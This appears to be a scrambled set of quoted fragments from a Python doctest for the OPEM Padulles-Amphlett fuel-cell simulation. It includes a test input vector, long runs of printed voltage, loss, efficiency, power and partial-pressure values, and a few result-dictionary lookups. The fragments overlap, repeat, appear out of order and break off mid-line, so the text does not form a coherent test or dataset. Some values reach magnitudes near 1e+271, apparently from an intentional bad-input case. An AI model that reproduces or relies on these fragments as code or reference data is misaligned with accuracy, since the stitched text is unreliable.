0.387853540075361 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502", ": 0.002644278024175193 V FC Efficiency : 0.5422224856637728 FC Power : 6.344003082266143 W FC", ">>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>>", "Eta Activation : 0.35009414904739194 V Eta Concentration : 0.00023552453535116493 V Eta Ohmic :", "Power : 0.5139579100323552 W FC Voltage : 5.1395791003235525 V Loss : 0.18576727978992955 V", "V Eta Ohmic : 0.0019366035503462617 V FC Efficiency : 0.55589469312397 FC Power :", ": 0.1966649285946839 atm PH2O : 0.24206059193086493 atm PO2 : 0.19034078646315894 atm Power-Thermal :", "Analyzing . . . I : 0.1 E : 6.14455344314445 V Eta Activation", ": 0.397705910482824 V PH2 : 0.19686163393728537 atm PH2O : 0.24230270226546458 atm PO2 :", ": 2.0 E : 6.144553272737403 V Eta Activation : 0.9103753288368093 V Eta Concentration", "W FC Voltage : -4.665905173901154e+271 V Loss : 9.331810347802308e+270 V PH2 : 0.19690378508212852", ": 0.19687568431889974 atm PH2O : 0.2423199958607931 atm PO2 : 0.1904597790361335 atm Power-Thermal :", ": 0.417106024344736 V Eta Concentration : 0.0006569460115677318 V Eta Ohmic : 0.005852080755831333 V", "Activation : 0.9103753288368093 V Eta Concentration : 2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270", "Eta Concentration : 0.0007590808465813247 V Eta Ohmic : 0.006750024222922298 V FC Efficiency :", ": 6.068412424065923 V Eta Activation : 0.2583036192079603 V Eta Concentration : 5.853018266659147e-05 V", "0.2424064638374358 atm PO2 : 0.19049944322712503 atm Power-Thermal : 3.338951337284836 W ########### I :", "V Eta Concentration : 0.0006366034731784721 V Eta Ohmic : 0.005672855976278701 V FC Efficiency", ": 0.38052969267197334 V Eta Concentration : 0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046 V", "V Loss : 0.4036265972020676 V PH2 : 0.19683353317405658 atm PH2O : 0.24226811507480747 atm", ". . . I : 0.1 E : 6.0684154992732005 V Eta Activation :", "Eta Concentration : 5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488 V FC Efficiency :", "FC Voltage : 3.9730043399134525 V Loss : 0.4190730008706778 V PH2 : 0.19674923088437024 atm", "V Eta Concentration : 0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046 V FC Efficiency", "FC Voltage : 3.950291009654725 V Loss : 0.42361505111213504 V PH2 : 0.19672113012114145 atm", "I : 2.0 E : 6.0683862744646095 V Eta Activation : 0.3839273955127959 V Eta", "atm PO2 : 0.19047564471253012 atm Power-Thermal : 4.041762851824391 W ########### I : 2.1", "6.748686546268298 W ########### I : 3.2 E : 6.068367804773196 V Eta Activation :", "Ohmic : 0.00017548304819292376 V FC Efficiency : 0.6589203974773784 FC Power : 0.5139579100323552 W", "Eta Concentration : 0.0006569460115677318 V Eta Ohmic : 0.005852080755831333 V FC Efficiency :", "PO2 : 0.19045184619793523 atm Power-Thermal : 4.761340157365757 W ########### I : 2.4 E", "0.19698808737181484 atm PH2O : 0.24245834462342142 atm PO2 : 0.19052324174171997 atm Power-Thermal : 2.6555639230341663", "PH2O : 0.24254481260006414 atm PO2 : 0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W ###########", "atm PH2O : 0.242285408670136 atm PO2 : 0.1904439133597369 atm Power-Thermal : 5.004572056867657 W", "V PH2 : 0.19708644004311557 atm PH2O : 0.24257939979072127 atm PO2 : 0.19057877160910808 atm", ": 0.5139579100323552 W FC Voltage : 5.1395791003235525 V Loss : 0.18576727978992955 V PH2", ": 2.3185876665375803e+269 W ########### I : 2.0 E : 6.144553272737403 V Eta Activation", "V Eta Ohmic : 9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270 FC Power :", "PH2O : 0.24214705990750765 atm PO2 : 0.19038045065415046 atm Power-Thermal : 7.003243683145644 W ###########", "Activation : 0.41506683170178466 V Eta Concentration : 0.0006366034731784721 V Eta Ohmic : 0.005672855976278701", "0.3464843028619262 V PH2 : 0.197030238516658 atm PH2O : 0.24251022540940706 atm PO2 : 0.19054704025631486", "0.42361505111213504 V PH2 : 0.19672113012114145 atm PH2O : 0.2421297663121791 atm PO2 : 0.19037251781595219", "Activation : 0.4264559863331208 V Eta Concentration : 0.0007590808465813247 V Eta Ohmic : 0.006750024222922298", "W FC Voltage : 3.918455976181777 V Loss : 0.4299811339950573 V PH2 : 0.1966789789762983", "PH2O : 0.24237187664677873 atm PO2 : 0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W ###########", ": 0.19047564471253012 atm Power-Thermal : 4.041762851824391 W ########### I : 2.1 E :", "Activation : 0.39024111055794025 V Eta Concentration : 0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716", "Ohmic : 0.0015834606415773538 V FC Efficiency : 0.5646650099463304 FC Power : 3.96394836982324 W", "0.004600031286563196 V FC Efficiency : 0.5174690806642298 FC Power : 10.494272955870581 W FC Voltage", ": 15.166791037577857 W FC Voltage : 3.888920778866117 V Loss : 0.4358872495310143 V PH2", ": 0.006750024222922298 V FC Efficiency : 0.49981193710908595 FC Power : 14.814425815913308 W FC", ": 0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W ########### I : 2.0 E :", "V Eta Ohmic : 0.0022902088041253615 V FC Efficiency : 0.5485505413555333 FC Power :", "V FC Efficiency : 0.6589203974773784 FC Power : 0.5139579100323552 W FC Voltage :", ": 0.5366552535984287 FC Power : 7.116048662715165 W FC Voltage : 4.185910978067744 V Loss", "0.5250728373249665 FC Power : 9.010249888496427 W FC Voltage : 4.095568131134739 V Loss :", ": 4.519750111503576 W ########### I : 2.3 E : 6.068381657907269 V Eta Activation", "Concentration : 0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461 V FC Efficiency : 0.569790429225178", "W ########### I : 1.1 E : 6.068400120676597 V Eta Activation : 0.3443319458183834", "V Eta Activation : 0.4038089891176398 V Eta Concentration : 0.0005353086845364485 V Eta Ohmic", "Ohmic : 0.006210893371826288 V FC Efficiency : 0.5036913732928463 FC Power : 13.750774490894704 W", ": 0.7735460064675803 W ########### I : 0.6 E : 6.0684078107750326 V Eta Activation", ": 0.19662277744984075 atm PH2O : 0.24200871114487932 atm PO2 : 0.19031698794856405 atm Power-Thermal :", "Eta Activation : 0.42817767789163225 V Eta Concentration : 0.0007795927885366656 V Eta Ohmic :", ": 0.19686163393728537 atm PH2O : 0.24230270226546458 atm PO2 : 0.19045184619793523 atm Power-Thermal :", "Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4,", "Eta Concentration : 4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271 V FC Efficiency :", "Loss : 0.41670093756357396 V PH2 : 0.1967632812659846 atm PH2O : 0.24218164709816473 atm PO2", "Power-Thermal : 0.588897103358606 W ########### I : 0.5 E : 6.068409348602667 V Eta", "V FC Efficiency : 0.55589469312397 FC Power : 4.769576467003663 W FC Voltage :", ": 8.25823714817561 W FC Voltage : 4.129118574087805 V Loss : 0.387853540075361 V PH2", "W ########### I : 1.2 E : 6.068398582464819 V Eta Activation : 0.35009414904739194", "FC Voltage : 4.129118574087805 V Loss : 0.387853540075361 V PH2 : 0.19690378508212852 atm", "Eta Activation : 0.9103753288368093 V Eta Concentration : 2.301179808139826e-06 V Eta Ohmic :", "atm Power-Thermal : 3.338951337284836 W ########### I : 1.8 E : 6.068389351849069 V", "Power : 14.460983747095012 W FC Voltage : 3.9083739857013544 V Loss : 0.4319972241282524 V", "E : 6.0683662652154 V Eta Activation : 0.417106024344736 V Eta Concentration : 0.0006569460115677318", "########### Report is generating ... Done! >>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>>", "4.489555538987407 V Loss : 0.3157701467791963 V PH2 : 0.19708644004311557 atm PH2O : 0.24257939979072127", "V Loss : 0.4319972241282524 V PH2 : 0.1966649285946839 atm PH2O : 0.24206059193086493 atm", "0.2420778855261935 atm PO2 : 0.19034871930135727 atm Power-Thermal : 8.033558485745605 W ########### I :", "atm PO2 : 0.19053117457991825 atm Power-Thermal : 2.432697510654893 W ########### I : 1.4", "0.5452780290261753 FC Power : 5.954436076965834 W FC Voltage : 4.253168626404167 V Loss :", "FC Voltage : 4.185910978067744 V Loss : 0.3764959824754877 V PH2 : 0.19694593622697168 atm", "Eta Concentration : 0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664 V FC Efficiency :", "Efficiency : 0.5174690806642298 FC Power : 10.494272955870581 W FC Voltage : 4.036258829180992 V", "W ########### I : 0.3 E : 6.068412424065923 V Eta Activation : 0.2583036192079603", ": 0.3157701467791963 V PH2 : 0.19708644004311557 atm PH2O : 0.24257939979072127 atm PO2 :", ": 0.39024111055794025 V Eta Concentration : 0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716 V", "atm Power-Thermal : 4.519750111503576 W ########### I : 2.3 E : 6.068381657907269 V", ": 8.818208962422144 W ########### Report is generating ... Done! >>> Padulles_Amphlett_Data[\"Status\"] True >>>", "########### I : 1.7 E : 6.068390890445182 V Eta Activation : 0.3731623911228729 V", ": 0.324807877394268 V PH2 : 0.19707238966150117 atm PH2O : 0.24256210619539273 atm PO2 :", "1.7 E : 6.068390890445182 V Eta Activation : 0.3731623911228729 V Eta Concentration :", "utf-8 -*- ''' >>> from opem.Dynamic.Padulles_Amphlett import * >>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"}", ": 0.002113348284589288 V FC Efficiency : 0.5520748042471996 FC Power : 5.1674201677537885 W FC", "6.0683662652154 V Eta Activation : 0.417106024344736 V Eta Concentration : 0.0006569460115677318 V Eta", "E : 6.068390890445182 V Eta Activation : 0.3731623911228729 V Eta Concentration : 0.0003347784463987542", "6.068390890445182 V Eta Activation : 0.3731623911228729 V Eta Concentration : 0.0003347784463987542 V Eta", "Concentration : 0.000494984370825149 V Eta Ohmic : 0.00442164533169592 V FC Efficiency : 0.5192622556245563", "Power-Thermal : 8.818208962422144 W ########### Report is generating ... Done! >>> Padulles_Amphlett_Data[\"Status\"] True", "Loss : 0.43396509140262446 V PH2 : 0.19665087821306954 atm PH2O : 0.2420432983355364 atm PO2", ": 9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270 FC Power : -9.331810347802308e+271 W FC", "2.212579832246212 W ########### I : 1.3 E : 6.068397044188998 V Eta Activation :", ": 6.068360106342617 V Eta Activation : 0.4246884348310017 V Eta Concentration : 0.0007385973342150736 V", "Eta Concentration : 7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664 V FC Efficiency :", "0.3579405643231677 V PH2 : 0.19700213775342923 atm PH2O : 0.24247563821874998 atm PO2 : 0.19053117457991825", ": 0.0060314264601405215 V FC Efficiency : 0.5050511549266622 FC Power : 13.393956628655083 W FC", "V PH2 : 0.19674923088437024 atm PH2O : 0.2421643535028362 atm PO2 : 0.1903883834923488 atm", "Ohmic : 0.0007026162388380664 V FC Efficiency : 0.5997124668722417 FC Power : 1.8711028966413943 W", "########### I : 0.6 E : 6.0684078107750326 V Eta Activation : 0.3041956781419353 V", "atm PH2O : 0.24230270226546458 atm PO2 : 0.19045184619793523 atm Power-Thermal : 4.761340157365757 W", "I(>0.1) leads to minus amount of V, please check your inputs Done! >>>", "4.05024559387154 V Loss : 0.4036265972020676 V PH2 : 0.19683353317405658 atm PH2O : 0.24226811507480747", "V Loss : 0.324807877394268 V PH2 : 0.19707238966150117 atm PH2O : 0.24256210619539273 atm", "W ########### I : 1.8 E : 6.068389351849069 V Eta Activation : 0.3769483587657406", "8.29401625290499 W ########### I : 3.8 E : 6.068358566463993 V Eta Activation :", "PO2 : 0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W ########### I : 1.2 E", "0.002644278024175193 V FC Efficiency : 0.5422224856637728 FC Power : 6.344003082266143 W FC Voltage", "Ohmic : 0.004600031286563196 V FC Efficiency : 0.5174690806642298 FC Power : 10.494272955870581 W", "0.19041218200694368 atm Power-Thermal : 5.992791140958347 W ########### I : 2.9 E : 6.068372423061707", "atm Power-Thermal : 2.3185876665375803e+269 W ########### I : 2.0 E : 6.144553272737403 V", "0.2921240370409447 V Eta Concentration : 9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419 V FC", ": 0.5646650099463304 FC Power : 3.96394836982324 W FC Voltage : 4.404387077581378 V Loss", "W ########### I : 0.7 E : 6.068406272883388 V Eta Activation : 0.31440243547871893", "########### I : 1.6 E : 6.068392428977227 V Eta Activation : 0.36914696409844006 V", ": 4.489555538987407 V Loss : 0.3157701467791963 V PH2 : 0.19708644004311557 atm PH2O :", "atm PO2 : 0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W ########### I : 1.0", "Activation : 0.36914696409844006 V Eta Concentration : 0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026", "########### I : 0.9 E : 6.068403196908046 V Eta Activation : 0.3310434726426763 V", "I : 2.8 E : 6.068373962362936 V Eta Activation : 0.40621862980268425 V Eta", "2.3 E : 6.068381657907269 V Eta Activation : 0.39318591119501267 V Eta Concentration :", "Eta Ohmic : 0.005314768076451755 V FC Efficiency : 0.5108802815228812 FC Power : 11.95459858763542", "0.5600666527156857 FC Power : 4.368519891182348 W FC Voltage : 4.368519891182348 V Loss :", "FC Voltage : 4.60290798706484 V Loss : 0.2931002723075654 V PH2 : 0.19711454080634436 atm", "Voltage : 4.60290798706484 V Loss : 0.2931002723075654 V PH2 : 0.19711454080634436 atm PH2O", "Power : 2.724941943281497 W FC Voltage : 4.541569905469162 V Loss : 0.30536758106117423 V", "Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>>", "E : 6.068373962362936 V Eta Activation : 0.40621862980268425 V Eta Concentration : 0.000555512176140013", "-2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270 V Loss : 4.63717533307516e+269 V PH2 :", "V PH2 : 0.19683353317405658 atm PH2O : 0.24226811507480747 atm PO2 : 0.19043598052153862 atm", "I : 2.9 E : 6.068372423061707 V Eta Activation : 0.4085437792118771 V Eta", "Eta Ohmic : 0.006750024222922298 V FC Efficiency : 0.49981193710908595 FC Power : 14.814425815913308", ": 0.0033538152156708046 V FC Efficiency : 0.5316790944492106 FC Power : 7.879484179737301 W FC", ": 0.0005267910327125488 V FC Efficiency : 0.6120471438396443 FC Power : 1.4321903165847678 W FC", "0.3232442167420945 V Eta Concentration : 0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461 V FC", "Eta Activation : 0.4129629601316751 V Eta Concentration : 0.0006162888970501038 V Eta Ohmic :", "Power : 6.344003082266143 W FC Voltage : 4.229335388177429 V Loss : 0.3678117158535559 V", "FC Efficiency : 0.5192622556245563 FC Power : 10.12561398467885 W FC Voltage : 4.05024559387154", "0.24242375743276434 atm PO2 : 0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W ########### I :", "3.1088387177404826 W ########### I : 1.7 E : 6.068390890445182 V Eta Activation :", "-4.665905173901154e+271 V Loss : 9.331810347802308e+270 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502", "PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None)", "V Eta Activation : 0.2921240370409447 V Eta Concentration : 9.76794818682758e-05 V Eta Ohmic", ": 0.23146009851376736 V Eta Concentration : 3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837 V", "Eta Activation : 0.3731623911228729 V Eta Concentration : 0.0003347784463987542 V Eta Ohmic :", ": 5.1395791003235525 V Loss : 0.18576727978992955 V PH2 : 0.19717074233280188 atm PH2O :", "Voltage : 3.918455976181777 V Loss : 0.4299811339950573 V PH2 : 0.1966789789762983 atm PH2O", ": 0.006929978850845375 V FC Efficiency : 0.49857958703411753 FC Power : 15.166791037577857 W FC", "Voltage : 4.7739677219492265 V Loss : 0.25888894042333943 V PH2 : 0.19714264156957312 atm PH2O", ": 5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488 V FC Efficiency : 0.6120471438396443 FC", "FC Voltage : 4.404387077581378 V Loss : 0.3328032238653337 V PH2 : 0.19705833927988675 atm", "6.068412424065923 V Eta Activation : 0.2583036192079603 V Eta Concentration : 5.853018266659147e-05 V Eta", "V FC Efficiency : 0.5064475653403494 FC Power : 13.035960331860592 W FC Voltage :", "Eta Activation : 0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07 V Eta Ohmic :", "0.2420432983355364 atm PO2 : 0.19033285362496066 atm Power-Thermal : 8.555574184086693 W ########### I :", "V Eta Activation : 0.38715939375662295 V Eta Concentration : 0.00041466432635066115 V Eta Ohmic", "Eta Ohmic : 0.0008785557847524419 V FC Efficiency : 0.5901164085980564 FC Power : 2.30145399353242", ": 0.387853540075361 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 :", ": 0.5341016324451575 FC Power : 7.498786919530012 W FC Voltage : 4.165992733072229 V Loss", "0.7735460064675803 W ########### I : 0.6 E : 6.0684078107750326 V Eta Activation :", "0.3960054536369255 V Eta Concentration : 0.00047486339861378836 V Eta Ohmic : 0.004243378155424144 V FC", ": 0.0007385973342150736 V Eta Ohmic : 0.00657019196303564 V FC Efficiency : 0.50107358791043 FC", "W FC Voltage : 4.165992733072229 V Loss : 0.380479323755368 V PH2 : 0.19693188584535729", "0.4190730008706778 V PH2 : 0.19674923088437024 atm PH2O : 0.2421643535028362 atm PO2 : 0.1903883834923488", "0.5341016324451575 FC Power : 7.498786919530012 W FC Voltage : 4.165992733072229 V Loss :", "6.068383196823811 V Eta Activation : 0.39024111055794025 V Eta Concentration : 0.0004347034505143372 V Eta", "PH2 : 0.1966930293579127 atm PH2O : 0.24209517912152204 atm PO2 : 0.19035665213955555 atm Power-Thermal", "Eta Ohmic : 0.006929978850845375 V FC Efficiency : 0.49857958703411753 FC Power : 15.166791037577857", "0.4107901672807063 V Eta Concentration : 0.0005960022064159204 V Eta Ohmic : 0.005314768076451755 V FC", "Eta Concentration : 0.0005960022064159204 V Eta Ohmic : 0.005314768076451755 V FC Efficiency :", "E : 6.068360106342617 V Eta Activation : 0.4246884348310017 V Eta Concentration : 0.0007385973342150736", "0.3839273955127959 V Eta Concentration : 0.00039465233709598025 V Eta Ohmic : 0.003531492225469087 V FC", "11.227208859041653 W FC Voltage : 4.0097174496577335 V Loss : 0.41173130254104057 V PH2 :", "Activation : 0.42817767789163225 V Eta Concentration : 0.0007795927885366656 V Eta Ohmic : 0.006929978850845375", "12.676756316854359 W FC Voltage : 3.9614863490169867 V Loss : 0.4213762911512418 V PH2 :", "Ohmic : 0.0038871991293599716 V FC Efficiency : 0.5250728373249665 FC Power : 9.010249888496427 W", ": 0.9818326194558784 W FC Voltage : 4.909163097279392 V Loss : 0.23185017288443285 V PH2", ": 0.5140663396997094 FC Power : 11.227208859041653 W FC Voltage : 4.0097174496577335 V Loss", ": 0.4246884348310017 V Eta Concentration : 0.0007385973342150736 V Eta Ohmic : 0.00657019196303564 V", "I : 2.7 E : 6.068375501600038 V Eta Activation : 0.4038089891176398 V Eta", "V PH2 : 0.19710049042472996 atm PH2O : 0.2425966933860498 atm PO2 : 0.1905867044473064 atm", "The value of I(>0.1) leads to minus amount of V, please check your", "0.24261398698137834 atm PO2 : 0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W ########### I :", ": 1.8711028966413943 W FC Voltage : 4.677757241603485 V Loss : 0.27813072895256186 V PH2", ": 0.5050511549266622 FC Power : 13.393956628655083 W FC Voltage : 3.9393990084279658 V Loss", "0.4358872495310143 V PH2 : 0.19663682783145514 atm PH2O : 0.24202600474020786 atm PO2 : 0.19032492078676233", "V Eta Concentration : 7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664 V FC Efficiency", ": 4.761340157365757 W ########### I : 2.4 E : 6.068380118926627 V Eta Activation", ": 6.068358566463993 V Eta Activation : 0.4264559863331208 V Eta Concentration : 0.0007590808465813247 V", "0.41506683170178466 V Eta Concentration : 0.0006366034731784721 V Eta Ohmic : 0.005672855976278701 V FC", "Eta Concentration : 0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275 V FC Efficiency :", "Analyzing . . . I : 0.1 E : 6.0684154992732005 V Eta Activation", ": 0.0007590808465813247 V Eta Ohmic : 0.006750024222922298 V FC Efficiency : 0.49981193710908595 FC", ">>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>>", "V Eta Activation : 0.3839273955127959 V Eta Concentration : 0.00039465233709598025 V Eta Ohmic", ": 0.35539503345654255 V Eta Concentration : 0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615 V", "Ohmic : 0.0029988129062160497 V FC Efficiency : 0.5366552535984287 FC Power : 7.116048662715165 W", ": 0.40642364231840483 V PH2 : 0.19681948279244216 atm PH2O : 0.2422508214794789 atm PO2 :", "Eta Ohmic : 0.0015834606415773538 V FC Efficiency : 0.5646650099463304 FC Power : 3.96394836982324", ": 0.39456301313781456 V PH2 : 0.19687568431889974 atm PH2O : 0.2423199958607931 atm PO2 :", "Activation : 0.4085437792118771 V Eta Concentration : 0.0005757433248249061 V Eta Ohmic : 0.005135904406545483", ": 3.3 E : 6.0683662652154 V Eta Activation : 0.417106024344736 V Eta Concentration", "########### I : 3.7 E : 6.068360106342617 V Eta Activation : 0.4246884348310017 V", "value of I(>0.1) leads to minus amount of V, please check your inputs", "atm Power-Thermal : 8.818208962422144 W ########### Report is generating ... Done! >>> Padulles_Amphlett_Data[\"Status\"]", "W ########### I : 1.3 E : 6.068397044188998 V Eta Activation : 0.35539503345654255", "V Eta Concentration : 0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735 V FC Efficiency", "13.393956628655083 W FC Voltage : 3.9393990084279658 V Loss : 0.4257931434330969 V PH2 :", "Ohmic : 0.0010546098289093816 V FC Efficiency : 0.5822525519832258 FC Power : 2.724941943281497 W", "0.0015834606415773538 V FC Efficiency : 0.5646650099463304 FC Power : 3.96394836982324 W FC Voltage", "Ohmic : 0.0012307785370829418 V FC Efficiency : 0.5755840434599239 FC Power : 3.1426888772911847 W", "0.4228725100457559 V Eta Concentration : 0.0007181421727400468 V Eta Ohmic : 0.006390481776561363 V FC", "1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376 V FC Efficiency : 0.6589203974773784 FC Power", "1.1623111227088154 W ########### I : 0.8 E : 6.068404734927729 V Eta Activation :", ": 6.144553272737403 V Eta Activation : 0.9103753288368093 V Eta Concentration : 2.301179808139826e-06 V", "0.41670093756357396 V PH2 : 0.1967632812659846 atm PH2O : 0.24218164709816473 atm PO2 : 0.19039631633054707", "FC Efficiency : 0.5211232875604884 FC Power : 9.755427943132343 W FC Voltage : 4.06476164297181", "V Eta Activation : 0.3310434726426763 V Eta Concentration : 0.0001762905810800498 V Eta Ohmic", "V FC Efficiency : 0.5600666527156857 FC Power : 4.368519891182348 W FC Voltage :", "Voltage : 4.306183473128157 V Loss : 0.3524430218673324 V PH2 : 0.1970161881350436 atm PH2O", "4.279867176181073 W ########### I : 2.2 E : 6.068383196823811 V Eta Activation :", "FC Efficiency : 0.5293741761651032 FC Power : 8.25823714817561 W FC Voltage : 4.129118574087805", "Efficiency : 0.5124481138904448 FC Power : 11.591576336201861 W FC Voltage : 3.997095288345469 V", ": 12.676756316854359 W FC Voltage : 3.9614863490169867 V Loss : 0.4213762911512418 V PH2", "0.19695998660858605 atm PH2O : 0.24242375743276434 atm PO2 : 0.19050737606532336 atm Power-Thermal : 3.1088387177404826", "I : 1.3 E : 6.068397044188998 V Eta Activation : 0.35539503345654255 V Eta", "6.0683708836963435 V Eta Activation : 0.4107901672807063 V Eta Concentration : 0.0005960022064159204 V Eta", "Power-Thermal : 0.24816738054412169 W ########### I : 0.3 E : 6.068412424065923 V Eta", "FC Voltage : 4.253168626404167 V Loss : 0.36304537588899266 V PH2 : 0.19698808737181484 atm", "Ohmic : 0.0019366035503462617 V FC Efficiency : 0.55589469312397 FC Power : 4.769576467003663 W", ": 4.0 E : 6.144553093215826 V Eta Activation : 0.9106431331307118 V Eta Concentration", "of I(>0.1) leads to minus amount of V, please check your inputs Done!", "0.19663682783145514 atm PH2O : 0.24202600474020786 atm PO2 : 0.19032492078676233 atm Power-Thermal : 8.818208962422144", "0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True,", "W FC Voltage : 4.129118574087805 V Loss : 0.387853540075361 V PH2 : 0.19690378508212852", "########### I : 1.5 E : 6.068393967445208 V Eta Activation : 0.3648724409731032 V", "PO2 : 0.19060257012370302 atm Power-Thermal : 0.588897103358606 W ########### I : 0.5 E", "0.0014070620817435461 V FC Efficiency : 0.569790429225178 FC Power : 3.555492278365111 W FC Voltage", "0.24230270226546458 atm PO2 : 0.19045184619793523 atm Power-Thermal : 4.761340157365757 W ########### I :", "atm Power-Thermal : 4.761340157365757 W ########### I : 2.4 E : 6.068380118926627 V", "Concentration : 3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837 V FC Efficiency : 0.6293798842665886", ": 0.4129629601316751 V Eta Concentration : 0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275 V", "PH2O : 0.24264857417203542 atm PO2 : 0.1906105029619013 atm Power-Thermal : 0.41280968341523216 W ###########", ": 0.380479323755368 V PH2 : 0.19693188584535729 atm PH2O : 0.24238917024210727 atm PO2 :", "V FC Efficiency : 0.5036913732928463 FC Power : 13.750774490894704 W FC Voltage :", "0.4 E : 6.068410886366294 V Eta Activation : 0.27735002084480426 V Eta Concentration :", "atm PO2 : 0.1906105029619013 atm Power-Thermal : 0.41280968341523216 W ########### I : 0.4", "V FC Efficiency : 0.5316790944492106 FC Power : 7.879484179737301 W FC Voltage :", "13.750774490894704 W FC Voltage : 3.9287927116842014 V Loss : 0.42791409484462756 V PH2 :", ">>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>>", "V Eta Ohmic : 1.8785852500552963e+271 V FC Efficiency : -1.2042213141380103e+271 FC Power :", "Loss : 0.3328032238653337 V PH2 : 0.19705833927988675 atm PH2O : 0.24254481260006414 atm PO2", ": 0.5293741761651032 FC Power : 8.25823714817561 W FC Voltage : 4.129118574087805 V Loss", "V Eta Ohmic : 0.0014070620817435461 V FC Efficiency : 0.569790429225178 FC Power :", ": 0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W ########### I : 0.6 E :", ": 0.41506683170178466 V Eta Concentration : 0.0006366034731784721 V Eta Ohmic : 0.005672855976278701 V", ": 4.111968011342347 V Loss : 0.3912833448667819 V PH2 : 0.19688973470051413 atm PH2O :", ": 6.068357026521189 V Eta Activation : 0.42817767789163225 V Eta Concentration : 0.0007795927885366656 V", "0.23185017288443285 V PH2 : 0.1971566919511875 atm PH2O : 0.24266586776736396 atm PO2 : 0.1906184358000996", "V Eta Ohmic : 0.0015834606415773538 V FC Efficiency : 0.5646650099463304 FC Power :", "Power : 11.227208859041653 W FC Voltage : 4.0097174496577335 V Loss : 0.41173130254104057 V", ": 0.1903883834923488 atm Power-Thermal : 6.748686546268298 W ########### I : 3.2 E :", "V Eta Activation : 0.41506683170178466 V Eta Concentration : 0.0006366034731784721 V Eta Ohmic", "atm PO2 : 0.1903883834923488 atm Power-Thermal : 6.748686546268298 W ########### I : 3.2", "0.33802037026202836 V Eta Concentration : 0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664 V FC", "FC Efficiency : 0.6120471438396443 FC Power : 1.4321903165847678 W FC Voltage : 4.7739677219492265", "PO2 : 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W ########### Report is generating ...", "4.368519891182348 V Loss : 0.3399763535283976 V PH2 : 0.19704428889827239 atm PH2O : 0.2425275190047356", "E : 6.0684078107750326 V Eta Activation : 0.3041956781419353 V Eta Concentration : 0.00011729309032954864", "V Loss : 0.397705910482824 V PH2 : 0.19686163393728537 atm PH2O : 0.24230270226546458 atm", "0.24264857417203542 atm PO2 : 0.1906105029619013 atm Power-Thermal : 0.41280968341523216 W ########### I :", "Eta Activation : 0.40130847825734167 V Eta Concentration : 0.0005151327744999589 V Eta Ohmic :", 